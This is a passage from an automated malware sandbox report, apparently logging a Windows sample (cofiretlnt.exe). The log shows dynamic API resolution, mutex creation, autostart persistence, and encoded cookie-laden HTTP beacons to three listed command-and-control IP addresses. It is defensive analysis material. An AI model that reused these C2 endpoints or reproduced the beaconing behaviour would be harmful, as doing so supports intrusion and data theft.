| Get Handle | c:\users\aetadzjz\appdata\local\temp\bgd.exe | base_address = 0xb00000 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\cofiretlnt.exe, size = 260 |
|
1 | |
| Get Address | - | function = GetBinaryTypeW, ordinal = 0, address_out = 0x3df99c |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x3df864 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x3df8b4 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x3df914 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x3df914 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x3df914 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x3df914 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = free, address_out = 0x75a19894 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = malloc, address_out = 0x75a19cee |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77e4e026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x762d6aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x762311f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x76231700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x76231809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x762317ec |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7624eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x762314e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x76235929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x762314c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x762311c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x76253102 |
|
1 |
Service (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = LDWCN705BA84C, wndproc_parameter = 0 |
|
1 |
System (54)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
1 | |
| Get Time | type = System Time, time = 2018-11-26 15:53:54 (UTC) |
|
3 | |
| Get Time | type = Ticks, time = 168309 |
|
3 | |
| Get Time | type = Ticks, time = 169323 |
|
1 | |
| Get Time | type = Ticks, time = 170337 |
|
1 | |
| Get Time | type = Ticks, time = 171351 |
|
1 | |
| Get Time | type = Ticks, time = 172365 |
|
1 | |
| Get Time | type = Ticks, time = 172396 |
|
2 | |
| Get Time | type = Ticks, time = 173379 |
|
1 | |
| Get Time | type = Ticks, time = 174393 |
|
1 | |
| Get Time | type = Ticks, time = 175407 |
|
1 | |
| Get Time | type = Ticks, time = 176421 |
|
1 | |
| Get Time | type = Ticks, time = 177435 |
|
1 | |
| Get Time | type = Ticks, time = 178449 |
|
3 | |
| Get Time | type = Ticks, time = 197949 |
|
4 | |
| Get Time | type = Ticks, time = 219212 |
|
4 | |
| Get Time | type = Ticks, time = 223892 |
|
1 | |
| Get Time | type = Ticks, time = 224111 |
|
1 | |
| Get Time | type = Ticks, time = 225125 |
|
1 | |
| Get Time | type = Ticks, time = 226139 |
|
1 | |
| Get Time | type = Ticks, time = 227153 |
|
1 | |
| Get Time | type = Ticks, time = 228167 |
|
1 | |
| Get Time | type = Ticks, time = 229181 |
|
1 | |
| Get Time | type = Ticks, time = 230195 |
|
1 | |
| Get Time | type = Ticks, time = 231209 |
|
1 | |
| Get Time | type = Ticks, time = 232223 |
|
1 | |
| Get Time | type = Ticks, time = 233237 |
|
1 | |
| Get Time | type = Ticks, time = 234251 |
|
1 | |
| Get Time | type = Ticks, time = 235265 |
|
1 | |
| Get Time | type = Ticks, time = 236279 |
|
1 | |
| Get Time | type = Ticks, time = 237293 |
|
1 | |
| Get Time | type = Ticks, time = 238307 |
|
1 | |
| Get Time | type = Ticks, time = 239321 |
|
1 | |
| Get Time | type = Ticks, time = 240335 |
|
1 | |
| Get Time | type = Ticks, time = 241349 |
|
1 | |
| Get Time | type = Ticks, time = 242363 |
|
1 | |
| Get Time | type = Ticks, time = 243377 |
|
1 | |
| Get Time | type = Ticks, time = 244391 |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
Mutex (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Release | - |
|
1 |
Network Behavior
HTTP Sessions (3)
| Information | Value |
|---|---|
| Total Data Sent | 1015 bytes |
| Total Data Received | 156 bytes |
| Contacted Host Count | 3 |
| Contacted Hosts | 79.129.42.122, 50.74.56.147, 75.161.71.124 |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 79.129.42.122 |
| Server Port | 990 |
| Data Sent | 339 |
| Data Received | 0 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 79.129.42.122, server_port = 990 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = Cookie: 47441=T5PCeJkUsh89vg8dNVchnP+kt/E5fceD37XA+wh/hSeM/EyCuw0StRPBeQc+n4sk+7Sg7rQY/j40mOamqAtjB2gWz9snCFLYSsXd47IuDwizMcI0GlIf6qxan9u5BR546krhR5j8iLWLa6htAW605MC4Xd0SP/tM7ASJxJrUwnswrKZWtH6d0b1c2qfWH10EpP/LywjX/r5tMypENmiiq0c6sC5ftihtdM1aHTxM48DpmjuthQtpzbYxK5XLQ1QqDVY5na9OpN/+iVjbBugGH4eB6TJ/gdMyHXN30VbjTa1VGgTmCcDDQVjc6rM9fSdur4oMaQcRGrUT2yjvlMiaTnlo6ch6LmFaF9Uj5Mn5JA8iFoc1f8R8Lx9UuVtlKe218TRVDEUDsqhWFDn8NQxHHBYPXz8ruYnFnQwsCBDtMjKyVDBPQHvibCkFxhIIbR2I00Lh8x8IdhMyPZkNwC9dif60/OFrPmOh00TJRYxFmJH3Nt7Eq0OB54cyGyGKRf8Vqxtt5Z4P1/bd49EAi/Hst8BZHlsdUdQfvwOiG6w9votk3ZGAgvguPutUMTMbshjoFbea0kbcSmrFb6w8xXCbcRQzzC6kseTnfOiBQRivDpzDjmju1PqikM5IyZkbSzcFRbE1Vqdi2GdGsTCbzMJOikDKvT9Nk1tp3V9SBqg95mMEmzmxBbA/TTolDIHB2WjDxGSEivoWhVC+wh9ex+GSWvySTdbKS5znSAL44AfCD16+PEUC, url = 79.129.42.122 |
|
1 | |
| Close Session | - |
|
3 |
HTTP Session #2
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 50.74.56.147 |
| Server Port | 8080 |
| Data Sent | 337 |
| Data Received | 0 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 50.74.56.147, server_port = 8080 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = Cookie: 1469=lDfHpeMyBYPbMQDfqMbdPY82GBPnJybCQvwjtyioCRD0xqazG+c5i/xc2mWz3of/+8XGhc/7I2nposRjKVvUmEEzHqsguVRKiKg5J1WvzB6g/SgBxOBe0cA8ftCqQFkgK5YIq7F6AC9pjXzVERoAGUd/aCg7QeGYo8yMESORCL3ggLjxynx50m+BMsgklI/8oAZ3U6bbAY70EdgaXrKCsIHcGXCM5CnzfUCmWw0z9ioApJFEHdJOTrMAs4gHGksFSiMBEMB6/r0v9HT95bgkO+1gEmKbHdhJO6IJ0Ht5VngKBxknO0xnEMinab5pDRXWZa274f2TlJ4/Z6ukgzSl03HNDlwuYQ/HEZMfL0gDO8ro3NjCNT0YijoK8CjyvNg3EqZsqoHOiRyo5uHgDzOtQwlXm2lMcyRL76XcnfiKlEepclzC4HsN0ALV0ztCsKcUFTCMJEZyMJmMwkBORkmfHBCQm1mYov5Qmsnss+6pPhGmqJN9IOtGLBZydM2KvO8cX0/wp5fHZ58J0CeN7TRvxfmrfPoy7pKeRmidh4FOj3bxf1GV8anfgJg14+IbJfvZ7ypCFPTq62lY94UCl+kThunXFV37g1GmEGMLF5AaoYF2tLu/q25kxWn4vx1ebobPtGK0dSPiRg3EuuQIVUqilTKZu718O562D1KEmiKEQqLB1axJLxBumZJhTmzllxqW+nf8KDJJ3sCPQr4o4pIAoal5l6/iuj9UmobaPzM3btLmH7X4iUNVzTUnPMV9s7wiD2lEtg==, url = 50.74.56.147 |
|
1 | |
| Close Session | - |
|
3 |
HTTP Session #3
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 75.161.71.124 |
| Server Port | 990 |
| Data Sent | 339 |
| Data Received | 156 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 75.161.71.124, server_port = 990 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = Cookie: 22716=lLuvezoi1SCacIyK6nFbNpMCZc9xUG91dmvPWmvvtRJn6NXsHYRTKLHVPx/57NvU6fRgeWnXFESOoJodDPqueCtX2FIDGODmY2vSopfq5207ipeVBLvyPwh8CkETv7wQBx4WOVrWJ7WDcVNgQjM0MelppXX6FsZovOQwXX5/ZLNmxdPHRQ2wQy5t2IfooqXkXTXLlu4XwY0fl/qU8RIA4eW4AvOP0yJspnL/aF58H81+UyjtdgU5GFCs2BASrlQl74lYKPeoP4QdSC0FQ3vaJQjUcvgPg6CW/vMaM/tZ5NH+nxPvat85DDlinzGBDzvMdZWArAqZXYDPr0C5I4RclWil5Jqv7YTTOmRBNPKYmt4810e4P/LTSKqBQQTHHAC6x6VRbqGZ+VVqwnofu7vrTdg/4JxZHWoScRpPJLfqbUPJW/GjVaBBLiZGAUmEa/K1Bqpej69u5vdXxJ2LpyN7qC9hHO5IBs0yJzxECKnlJpRavudA5uaqf9fhUr1vKMJW/4F/7Sht8b6UEJTRwL0PK2X6KQiH03XHnYr8KR6xSu6RtRL568lgrIrmzbRU3jtpXtkO0rY/lqSZCGZjCxPQ+aav+fb+3EWbtLrHSB+Z/oaIjdUbcwLF/Q+8NRzQWKVkbArEUBpaccW/Vm+/W/3mYynOPqFNSzzQoBGLvPhX3vkEh/glpN3MXvRSBjtQGc39k8IqjNhVhQBCSuIKAyTySuWf9VvmDI6hzz0VtpL7UaD5VlEg, url = 75.161.71.124 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Close Session | - |
|
3 |
Process #23: cofiretlnt.exe
32
0
| Information | Value |
|---|---|
| ID | #23 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\cofiretlnt.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:04:25, Reason: Autostart |
| Unmonitor | End Time: 00:04:32, Reason: Self Terminated |
| Monitor Duration | 00:00:07 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x4d0 |
| Parent PID | 0x3a0 (Unknown) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
4D4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00227fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x00248fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x00268fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0028ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0029ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00293fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b3fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x0048ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0067ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000680000 | 0x00680000 | 0x00807fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x00990fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x009a0000 | 0x00c6efff | Memory Mapped File | r |
|
|
|
- |
| cofiretlnt.exe | 0x013c0000 | 0x013e2fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x00000000013f0000 | 0x013f0000 | 0x027effff | Pagefile Backed Memory | r |
|
|
|
- |
| esent.dll | 0x73660000 | 0x73802fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x73810000 | 0x73817fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73820000 | 0x7387bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73880000 | 0x738befff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74c30000 | 0x74c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74c40000 | 0x74c9ffff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x75430000 | 0x7551ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75570000 | 0x7560ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76490000 | 0x7655bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76560000 | 0x7660bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76620000 | 0x7672ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76730000 | 0x767bffff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x767c0000 | 0x7685cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76860000 | 0x76878fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76930000 | 0x76975fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76980000 | 0x76a7ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x76a80000 | 0x76adffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000076ce0000 | 0x76ce0000 | 0x76dfefff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000076e00000 | 0x76e00000 | 0x76ef9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x76f00000 | 0x770a8fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x770b0000 | 0x770b4fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x770e0000 | 0x7725ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
Module (24)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | msvcrt.dll | base_address = 0x76560000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76620000 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\cofiretlnt.exe, size = 260 |
|
1 | |
| Get Address | - | function = GetBinaryTypeW, ordinal = 0, address_out = 0x14f754 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x14f61c |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x14f66c |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x14f6cc |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x14f6cc |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x14f6cc |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x14f6cc |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = free, address_out = 0x76569894 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = malloc, address_out = 0x76569cee |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x7710e026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x766d6aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x766311f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x76631700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x76631809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x766317ec |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7664eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x766314e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x76635929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x766314c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x766311c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x76653102 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-26 15:56:37 (UTC) |
|
3 |
Mutex (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = PEM3A0 |
|
1 | |
| Create | mutex_name = PEM4D0 |
|
1 |
Process #24: cofiretlnt.exe
59
4
| Information | Value |
|---|---|
| ID | #24 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\cofiretlnt.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:04:31, Reason: Child Process |
| Unmonitor | End Time: 00:04:55, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:24 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x544 |
| Parent PID | 0x4d0 (c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
548
0x
648
0x
71C
0x
720
0x
724
0x
750
0x
764
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00077fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000080000 | 0x00080000 | 0x00083fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000080000 | 0x00080000 | 0x00080fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x000cffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x000d0000 | 0x00136fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000140000 | 0x00140000 | 0x001fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x00218fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x00238fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000240000 | 0x00240000 | 0x00243fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000240000 | 0x00240000 | 0x00241fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x0036ffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0048ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000370000 | 0x00370000 | 0x0044efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000450000 | 0x00450000 | 0x0048ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000490000 | 0x00490000 | 0x0049ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004a0000 | 0x004a0000 | 0x004a3fff | Pagefile Backed Memory | rw |
|
|
|
- |
| windowsshell.manifest | 0x004a0000 | 0x004a0fff | Memory Mapped File | r |
|
|
|
- |
| index.dat | 0x004a0000 | 0x004abfff | Memory Mapped File | rw |
|
|
|
|
| private_0x00000000004b0000 | 0x004b0000 | 0x0052ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000530000 | 0x00530000 | 0x0056ffff | Private Memory | rw |
|
|
|
- |
| rsaenh.dll | 0x00570000 | 0x005abfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000570000 | 0x00570000 | 0x00571fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x00580000 | 0x00587fff | Memory Mapped File | rw |
|
|
|
|
| index.dat | 0x00590000 | 0x0059ffff | Memory Mapped File | rw |
|
|
|
|
| index.dat | 0x00590000 | 0x0059ffff | Memory Mapped File | rw |
|
|
|
|
| private_0x00000000005a0000 | 0x005a0000 | 0x0067ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x005dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x005e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x0061ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000620000 | 0x00620000 | 0x00620fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000630000 | 0x00630000 | 0x00630fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000640000 | 0x00640000 | 0x0067ffff | Private Memory | rw |
|
|
